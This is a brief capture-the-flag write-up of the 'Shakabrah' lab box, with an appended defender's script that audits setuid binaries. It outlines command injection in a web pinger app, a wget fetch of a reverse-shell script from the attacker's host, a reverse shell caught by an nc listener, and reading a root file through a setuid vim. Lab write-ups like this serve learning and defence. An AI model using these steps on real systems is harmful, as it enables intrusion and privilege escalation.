Hey,
Here’s a quick summarization of the virtual target called Shakabrah on Proving Grounds.
If you’re new, apply for an account, get the openvpn pack, run it with # openvpn universal.ovpn and you’ll be connected via VPN to the target box.
It’s a great little environment for learning about this subject.

Anyhow, here’s my summary:
1. nmap to find tcp 22/80 open
2. Browse to 80, see a pinger app, ripe for abuse. Can do most Linux commands like wget, ls, pwd etc. CAN write to /tmp so wget me/revshell.sh but I ended up not needing that.
3. A python3 command caused it to dial back to me on 80 but refused on 4444. (Had to disable nginx locally on 80 to let nc -nvlp 80 use the port.)
5. Anyhow, got unpriv shell, then found suid bit binaries with
$ find / -perm -u=s -type f 2>/dev/null and found vim.basic. Headed to revshells.com.
6. Saw vim.basic but their string never worked and I simply guessed $ vim /root/proof.txt (Total guess) to elicit the hash for the 2nd flag.
Didn’t even need to get root lol. score!

Gerg
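
The same find from step 5, turned into a defender's audit (an added example, not part of the original post): it lists every setuid file under a directory and flags general-purpose tools such as vim.basic, which open any file the effective user can read. The function names and REVIEW_LIST are constructed for illustration, and GNU find/stat are assumed.

```shell
#!/bin/sh
# Added example: audit setuid binaries under a directory tree.
# REVIEW_LIST is a constructed, non-exhaustive list of general-purpose tools
# (editors, pagers, interpreters, shells) that should never carry the setuid
# bit, because they will open any file the effective user can reach.
REVIEW_LIST="vim vim.basic vim.tiny vi nano less more python3 perl bash sh"

# classify_suid NAME
# Prints FLAG when NAME is on REVIEW_LIST, otherwise REVIEW (needs a human look).
classify_suid() {
    for tool in $REVIEW_LIST; do
        if [ "$1" = "$tool" ]; then
            echo FLAG
            return 0
        fi
    done
    echo REVIEW
}

# audit_suid ROOT
# Prints one line per setuid regular file: "<verdict> <mode> <owner> <path>".
# -perm -4000 is the numeric form of the post's -perm -u=s.
# -xdev keeps the scan on one filesystem (skips /proc, network mounts).
audit_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r path; do
        verdict=$(classify_suid "$(basename "$path")")
        mode=$(stat -c '%a' "$path")
        owner=$(stat -c '%U' "$path")
        echo "$verdict $mode $owner $path"
    done
}

# Run as: sh audit_suid.sh /   (no argument: only define the functions)
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

A FLAG line owned by root is the finding to fix first; `chmod u-s <path>` clears the bit.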
